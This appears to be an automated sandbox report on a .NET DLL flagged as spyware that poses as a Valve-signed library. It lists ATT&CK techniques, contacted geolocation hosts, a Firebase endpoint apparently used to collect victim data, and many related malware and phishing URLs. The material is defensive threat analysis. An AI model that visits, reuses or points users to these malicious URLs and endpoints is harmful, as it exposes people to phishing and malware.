                        Source: Yara matchFile source: 00000011.00000002.1805367986.0000021A9FE12000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1703297864.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1806920256.0000021EF74E2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1804504731.000001D6442D2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.3557919127.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1730594231.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1803990209.0000020FEDBB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1806280015.000002113B832000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1812533280.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1805248245.000001DA7ABE2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1815867810.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1804903406.000001EDD23B2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1805370892.000002B1ACFD2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6220, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5824, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6956, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5052, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2500, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3748, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6864, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                        DLL Side-Loading                        		112
                        Process Injection                        		11
                        Masquerading                        		1
                        Input Capture                        		1
                        Process Discovery                        		Remote Services1
                        Input Capture                        		1
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		LSASS Memory21
                        Virtualization/Sandbox Evasion                        		Remote Desktop ProtocolData from Removable Media1
                        Ingress Tool Transfer                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)21
                        Virtualization/Sandbox Evasion                        		Security Account Manager1
                        Application Window Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive3
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook112
                        Process Injection                        		NTDS1
                        System Network Configuration Discovery                        		Distributed Component Object ModelInput Capture14
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Obfuscated Files or Information                        		LSA Secrets12
                        System Information Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Rundll32                        		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        DLL Side-Loading                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        vstdlib_s64.dll.dll26%ReversingLabsByteCode-MSIL.Trojan.Zilla
                        vstdlib_s64.dll.dll100%Joe Sandbox ML

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://telize.com/geoip0%Avira URL Cloudsafe
                        https://argentina-e4162-default-rtdb.firebaseio.com/user.json0%Avira URL Cloudsafe
                        http://api.ipify.org/0%Avira URL Cloudsafe
                        http://freegeoip.net/xml/0%Avira URL Cloudsafe
                        https://www.telize.com/geoip0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        telize.com
                        		88.198.193.213
                        		truetrue
                          		unknown
                          www.telize.com
                          		88.198.193.213
                          		truetrue
                            		unknown
                            api.ipify.org
                            		104.26.12.205
                            		truetrue
                              		unknown
                              freegeoip.net
                              		3.33.130.190
                              		truetrue
                                		unknown
                                argentina-e4162-default-rtdb.firebaseio.com
                                		34.120.206.254
                                		truefalse
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://api.ipify.org/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://freegeoip.net/xml/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://argentina-e4162-default-rtdb.firebaseio.com/user.jsonfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://telize.com/geoiptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.telize.com/geoiptrue
                                  • Avira URL Cloud: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  104.26.12.205
                                  		api.ipify.orgUnited States
                                  		13335CLOUDFLARENETUStrue
                                  88.198.193.213
                                  		telize.comGermany
                                  		24940HETZNER-ASDEtrue
                                  3.33.130.190
                                  		freegeoip.netUnited States
                                  		8987AMAZONEXPANSIONGBtrue
                                  34.120.206.254
                                  		argentina-e4162-default-rtdb.firebaseio.comUnited States
                                  		15169GOOGLEUSfalse

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1473780
                                  Start date and time:2024-07-15 21:17:36 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 11m 3s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Run name:Run with higher sleep bypass
                                  Number of analysed new started processes analysed:26
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:vstdlib_s64.dll.dll
                                  renamed because original name is a hash value
                                  Original Sample Name:vstdlib_s64.dll.exe
                                  Detection:MAL
                                  Classification:mal80.troj.spyw.evad.winDLL@38/2@5/4
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .dll
                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • VT rate limit hit for: vstdlib_s64.dll.dll

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  15:19:24API Interceptor3996151x Sleep call for process: rundll32.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  104.26.12.2056OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                  • api.ipify.org/
                                  SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exeGet hashmaliciousConti, PureLog Stealer, Targeted RansomwareBrowse
                                  • api.ipify.org/
                                  482730621.exeGet hashmaliciousStealitBrowse
                                  • api.ipify.org/?format=json
                                  482730621.exeGet hashmaliciousStealitBrowse
                                  • api.ipify.org/?format=json
                                  Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                  • api.ipify.org/?format=json
                                  Sky-Beta.exeGet hashmaliciousStealitBrowse
                                  • api.ipify.org/?format=json
                                  SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                  • api.ipify.org/
                                  lods.cmdGet hashmaliciousRemcosBrowse
                                  • api.ipify.org/
                                  88.198.193.2136OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                  • telize.com/geoip
                                  K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
                                  • telize.com/geoip
                                  30EAFDB7C2C580890C4FB2A7101DB1D22C88BD723603F.exeGet hashmaliciousQuasarBrowse
                                  • telize.com/geoip
                                  XIiRHEaA9R.exeGet hashmaliciousQuasarBrowse
                                  • www.telize.com/geoip
                                  svchost.exeGet hashmaliciousQuasarBrowse
                                  • www.telize.com/geoip
                                  conn.exeGet hashmaliciousQuasarBrowse
                                  • www.telize.com/geoip
                                  3.33.130.190New PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                  • www.mscuration.com/txr6/
                                  ORDEN_240715189833.IMGGet hashmaliciousDarkTortilla, FormBookBrowse
                                  • www.shapenbuy.com/5xz5/
                                  BL.exeGet hashmaliciousFormBookBrowse
                                  • www.abc8web.com/sm5e/
                                  OrderPI.exeGet hashmaliciousFormBookBrowse
                                  • www.lextcommunities.com/qt3s/
                                  docs_pdf.exeGet hashmaliciousFormBookBrowse
                                  • www.789bet1okvip.solutions/aoam/?D0Pts04=Eo7hyHn30cp3PMowPDjUS1eso/Zba7hHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvVQxsVStEDyJQgF4EVzhIE64C3aguyc8vXyTVrLHS4c+iCk5yFwg=&Q8s=tdcd5h7ptjmdxx
                                  payment advice.exeGet hashmaliciousFormBookBrowse
                                  • www.abc8web.com/sm5e/
                                  vNrcPvMYLZmn2cc.exeGet hashmaliciousFormBookBrowse
                                  • www.zerolength.xyz/mc10/?yrCDSlw=+hw+aGSrqNJPXAKTI+d1f9+ihmayTPYKE17mK9H9odLh7YQ+aA2Ta0l7fr2FH5vYxut0&Jlt=Y4Ctjz3PDNY8yDR
                                  MV SHUHA QUEEN II.exeGet hashmaliciousFormBookBrowse
                                  • www.abc8web.com/sm5e/
                                  3O0zPitVnR82n5Y.exeGet hashmaliciousFormBookBrowse
                                  • www.fundraiserstuffies.com/sm5u/

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  telize.com6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                  • 88.198.193.213
                                  K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
                                  • 88.198.193.213
                                  30EAFDB7C2C580890C4FB2A7101DB1D22C88BD723603F.exeGet hashmaliciousQuasarBrowse
                                  • 88.198.193.213
                                  XIiRHEaA9R.exeGet hashmaliciousQuasarBrowse
                                  • 88.198.193.213
                                  svchost.exeGet hashmaliciousQuasarBrowse
                                  • 88.198.193.213
                                  conn.exeGet hashmaliciousQuasarBrowse
                                  • 88.198.193.213
                                  freegeoip.net6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                  • 15.197.148.33
                                  Zz3h8cOX1E.exeGet hashmaliciousQuasarBrowse
                                  • 15.197.148.33
                                  z4XlS0wTQM.exeGet hashmaliciousQuasarBrowse
                                  • 15.197.148.33
                                  Zz3h8cOX1E.exeGet hashmaliciousQuasarBrowse
                                  • 3.33.130.190
                                  K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
                                  • 172.67.75.176
                                  Commission_Dec23_Exec_Approval.xlsx.jsGet hashmaliciousBlackshadesBrowse
                                  • 104.26.15.73
                                  30EAFDB7C2C580890C4FB2A7101DB1D22C88BD723603F.exeGet hashmaliciousQuasarBrowse
                                  • 104.26.15.73
                                  XIiRHEaA9R.exeGet hashmaliciousQuasarBrowse
                                  • 104.26.15.73
                                  Outstanding Secured Credit Invoices.pdf.exeGet hashmaliciousBlackshadesBrowse
                                  • 172.67.75.176
                                  api.ipify.orghttps://choicesfdc.com.au/readm.html?colors=c2FyYS5nZWlnZXJAc2JhZmxhLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                  • 104.26.12.205
                                  6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                  • 104.26.12.205
                                  Zam#U00f3wienie - #20240715-A09461_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.12.205
                                  0001.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  Great Lake - Quote#474701.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.12.205
                                  Josephine Lawrence items.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 104.26.12.205
                                  RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                  • 172.67.74.152
                                  Hhf5a5ATds.exeGet hashmaliciousUnknownBrowse
                                  • 172.67.74.152
                                  Hhf5a5ATds.exeGet hashmaliciousUnknownBrowse
                                  • 172.67.74.152
                                  www.telize.com30EAFDB7C2C580890C4FB2A7101DB1D22C88BD723603F.exeGet hashmaliciousQuasarBrowse
                                  • 88.198.193.213
                                  XIiRHEaA9R.exeGet hashmaliciousQuasarBrowse
                                  • 88.198.193.213
                                  svchost.exeGet hashmaliciousQuasarBrowse
                                  • 88.198.193.213
                                  conn.exeGet hashmaliciousQuasarBrowse
                                  • 88.198.193.213

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  CLOUDFLARENETUShttps://choicesfdc.com.au/readm.html?colors=c2FyYS5nZWlnZXJAc2JhZmxhLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                  • 172.67.74.152
                                  https://spanx.com/collections/leggings?utm-hero=&utm_source=Klaviyo&utm_medium=email&utm_campaign=b_20240715_am_p_app_fauxl_faux-leather-a-sale_1_null_monthly_null_null_new&utm_content=Campaign&utm_klaviyo_id=01HJCQRZCCZXGQM3B65Z7D4E75&_kx=mhvwyIGBPtOsKzV7i9rwlPKJdw9Lx_wbKc2Xp0uaPyvrVszY1oF4258xIhwwIzff.RN8rMYGet hashmaliciousUnknownBrowse
                                  • 172.64.151.101
                                  6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                  • 104.26.12.205
                                  https://34.75.2o2.lol/XVjBTRlVwbW40SnF4OXJSYmJkbVUxSkdPT2cwQWJtMTRNNVA3VDN5UVRVaUlHR0pmdmZZd1Q5dUp0RUlwY0pPVGpKcUR3bXhYODB1NWtVTUk3RjdGUnJ6YnhHeG1TOXE0Z1MwUVhKRndKN1N5UVJPS3V1L1NycmpzdFJHQWRKbndEbVg4ODMzNE1nQ2hiazFtQmR3VEZJeHYyWXAycTEzUEZMODFqTGxmdjd2SDlNQVhHeFAzYU5XMy0td2Y2dStNQ0JBZHl6a1JJVi0tbS82L0xUaU04RU1Qc2dWdldWbm02QT09?cid=2117374656Get hashmaliciousUnknownBrowse
                                  • 104.16.117.116
                                  https://cloud-drive.services/i/a5b210032126e461fbaa7518681a0ce06Get hashmaliciousUnknownBrowse
                                  • 1.1.1.1
                                  855d156285ccf04888dae255256e42682756098471514f6155c7a5ef8556a95f.zipGet hashmaliciousSnake KeyloggerBrowse
                                  • 188.114.96.3
                                  https://fyui.short.gy/Pu658cGet hashmaliciousUnknownBrowse
                                  • 172.64.155.119
                                  http://links.888brands.net/ctt?m=34615482&r=LTg2NDEzNjA1MDIS1&b=0&j=MjUyMjI0NDU0OAS2&mt=1&kt=12&kx=1&k=888-external-en_custhelp_com_a&kd=//cvgmilano.com/img/#tokyo1@tira.co.jpGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 104.17.25.14
                                  Complete with Docusign dmoore@nsedc.pdfGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                  • 104.17.2.184
                                  AMAZONEXPANSIONGBhttps://spanx.com/collections/leggings?utm-hero=&utm_source=Klaviyo&utm_medium=email&utm_campaign=b_20240715_am_p_app_fauxl_faux-leather-a-sale_1_null_monthly_null_null_new&utm_content=Campaign&utm_klaviyo_id=01HJCQRZCCZXGQM3B65Z7D4E75&_kx=mhvwyIGBPtOsKzV7i9rwlPKJdw9Lx_wbKc2Xp0uaPyvrVszY1oF4258xIhwwIzff.RN8rMYGet hashmaliciousUnknownBrowse
                                  • 52.223.40.198
                                  http://24usred.com/0kqZRSGet hashmaliciousUnknownBrowse
                                  • 52.223.40.198
                                  https://skmadvocates.co.ke/dGt/bm9BkNQTsUBoAHHVY36CsnStq75FyBQg8CeZJT4xRH2NEhgsnPSR8gtKpSjbvPtdZbrTnuyG33FV5tDBJraTiqCTpLfzVJSeqV8cEPCNLNV42udbNRkGNUXivyFTVq9xo6Get hashmaliciousHTMLPhisherBrowse
                                  • 3.33.220.150
                                  http://itumbrellagroup.comGet hashmaliciousUnknownBrowse
                                  • 52.223.39.232
                                  New PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                  • 3.33.130.190
                                  ORDEN_240715189833.IMGGet hashmaliciousDarkTortilla, FormBookBrowse
                                  • 3.33.244.179
                                  https://mettamasklogiinf.gitbook.io/us/Get hashmaliciousUnknownBrowse
                                  • 3.33.235.18
                                  DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                  • 3.33.244.179
                                  http://service-public-finances.com/Get hashmaliciousPhisherBrowse
                                  • 52.223.40.198
                                  HETZNER-ASDE6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                  • 88.198.193.213
                                  http://www.nicetours.netGet hashmaliciousUnknownBrowse
                                  • 46.4.249.94
                                  http://4allpromo.com/Get hashmaliciousUnknownBrowse
                                  • 136.243.44.113
                                  c32420d2-f683-f305-71f5-f5966fa0459d.emlGet hashmaliciousHTMLPhisherBrowse
                                  • 95.217.66.83
                                  https://trk.klclick3.com/ls/click?upn=u001.I9LhpOxgCcXrD8xJgdEO8WUi5tV6wurQhjXRfDAEMS-2FcMa0g0FTnahsI5IEFHinKC-2FGj8kpAqnaoI6Qoa3vFLySKKSAfv0Wxu2Dy-2BRyMntsvwfzFfHILPHPRV90LmePFgMglDqCtK67PLGfWxTEMO93TwkvZZtNoI477LbXPoBjcrwXEgXl1dr5-2Bsbz8VZiUNXN768BEIA-2BYnNr4FIu9nA-3D-3DATse_RSmWOI3fPdFDxAydigDPQ0uJwuQ-2FUs3Wu1xZT2pFOHtvwUa8-2Ftks3ld44BID-2BJgD3ps4M8U7HlIP10yVJ6ZeFvrA3iSG0rco-2Fzt7OL4FXId6TCwVFcQcW-2F2E-2Faa3q7Weo2xYvFD1h9l7jEVdzkUp4Kp77hFD1XYDRoeiAzaz-2BFA4Srg7EiFD-2BO6F2w7c4O0pEK7boN40RNA-2F8TusPddYFOH48pk30jzUw7CYeSygfO9hZkczhRjxavPfa15ZQShZu24zwPQtiM5rYtaL0zKZeMvKbYsdrel3rTSJBLKXR2MMcVfiOQJo1JHVPclcvULrA5xewzIBFupBKpLaDZv1KWbZjd-2F-2BEE4MzV1Vme-2FCaJxOXBca4gsTghUHHiiDIxlLzjYnWoXwKNHeSslKR-2BUfUjOwwSmF8fN79-2FzJVuaw4lasmT9EvZxZK-2BAH7JlY5rrgFg8Woxh0SAeruKYO5LevAgBmW3c5sr-2F85S8FCROz5cY3UDqnpYtBxr1o9XTEZg-2FV#/kLIB1/evbLziA5E-SUREIDAN1VmLjN2YAtWauRWdi5SYsxWatF2aGet hashmaliciousHTMLPhisherBrowse
                                  • 95.217.66.83
                                  o82ktPixLt.exeGet hashmaliciousRedLineBrowse
                                  • 95.217.245.123
                                  gQzJjvCHZV.exeGet hashmaliciousRedLineBrowse
                                  • 95.217.245.123
                                  DCAbo3D46k.exeGet hashmaliciousRedLineBrowse
                                  • 95.217.245.123
                                  wkvH2q7DNh.exeGet hashmaliciousRedLineBrowse
                                  • 95.217.245.123

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  54328bd36c14bd82ddaa0c04b25ed9ad6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  855d156285ccf04888dae255256e42682756098471514f6155c7a5ef8556a95f.zipGet hashmaliciousSnake KeyloggerBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  rDoc_87993766478.exeGet hashmaliciousLokibotBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  rTransaction_ReceiptCopy.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  rTNT__consignmentnumber__87993766478.exeGet hashmaliciousLokibotBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  NewOrder_LCL240887.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  FVG2-20240704.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  SecuriteInfo.com.Win64.PWSX-gen.3492.24691.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254
                                  #U8acb#U6c42#U66f8.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                  • 88.198.193.213
                                  • 34.120.206.254

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rundll32.exe.log

                                  Download File
                                  Process:C:\Windows\System32\rundll32.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):42
                                  Entropy (8bit):4.0050635535766075
                                  Encrypted:false
                                  SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                  MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                  SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                  SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                  SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                  Malicious:false
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                  C:\Windows\System32\Data.log

                                  Download File
                                  Process:C:\Windows\System32\rundll32.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):10
                                  Entropy (8bit):2.7219280948873625
                                  Encrypted:false
                                  SSDEEP:3:Jw/zn:Szn
                                  MD5:A727C23FB0D2ED884F90288656DE1378
                                  SHA1:7BDF93C8575CA64B179D7316531BFF47F2D06768
                                  SHA-256:58F2795D1156D90EC8057C218D5E53E54A21FE92AF2414D516C5A77B363FDA6B
                                  SHA-512:B2732256B5675E00960DF616CB78D723D886CB0E11C181EB7650CDE30BAE251732EE56F93132A1282DBBD2EF3662674540AFAC08EC98BEB8FBBAF3A5DDD56A28
                                  Malicious:false
                                  Preview:15:07:2024

                                  Static File Info

                                  General

                                  File type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):4.1366584226365735
                                  TrID:
                                  • Win64 Dynamic Link Library (generic) Net Framework (111504/3) 44.42%
                                  • Win64 Dynamic Link Library (generic) (102004/3) 40.63%
                                  • Win64 Executable (generic) Net Framework (21505/4) 8.57%
                                  • Win64 Executable (generic) (12005/4) 4.78%
                                  • Generic Win/DOS Executable (2004/3) 0.80%
                                  File name:vstdlib_s64.dll.dll
                                  File size:7'477'096 bytes
                                  MD5:ac7da10e20d625cc463536172d0ac33e
                                  SHA1:c4242194e3faa82506513e2572c160a30082bfb0
                                  SHA256:6799f1948048b91991392b421ccc6b30be415cda26deb71baeecb33b41b12959
                                  SHA512:77f929fa05266793765014b24fede5f0c64f88598f9580a6aaa4d339b428e4a68eacdb4dc0cab1f1c428f870c57ac54e55423f8fbbe80fd1a48ac54442f1787a
                                  SSDEEP:24576:KxClp92/e9DlZ62nbFSu28jugkg91tVWwS+pvbOOmwWYhssXfKySQN1jk1eI8ykJ:h0bz0nbb
                                  TLSH:8976324CE43A95D8CD4672F0AC96198C39855DD89FBD572A042CC0B827EB6BC42877FE
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....f.f.........." ......q.........f.q.. ........... .......................`r...........@...@......@............... .....

                                  File Icon

                                  Icon Hash:7ae282899bbab082

                                  Static PE Info

                                  General

                                  Entrypoint:0x18071fd66
                                  Entrypoint Section:.text
                                  Digitally signed:true
                                  Imagebase:0x180000000
                                  Subsystem:windows cui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x6685668E [Wed Jul 3 14:56:14 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:dae02f32a21e03ce65412f6e56942daa

                                  Authenticode Signature

                                  Signature Valid:false
                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                  Signature Validation Error:The digital signature of the object did not verify
                                  Error Number:-2146869232
                                  Not Before, Not After
                                  • 07/10/2021 01:00:00 10/10/2024 00:59:59
                                  Subject Chain
                                  • CN=Valve Corp., O=Valve Corp., L=Bellevue, S=Washington, C=US
                                  Version:3
                                  Thumbprint MD5:83896ECC20DB9E84A1A1D6D5B5B15A5D
                                  Thumbprint SHA-1:935767D66FAD4AD2D1F03A095C49370DC74DF607
                                  Thumbprint SHA-256:E98CCA8343960798A47BDB3CDD319DB4B9C6DBD8BC7574C13F6C09A925AEC0E9
                                  Serial:0689B3BCEB4409890A32D71976B132A4

                                  Entrypoint Preview

                                  Instruction
                                  dec eax
                                  mov eax, dword ptr [80002000h]
                                  add dword ptr [eax], eax
                                  add byte ptr [eax], al
                                  jmp eax
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
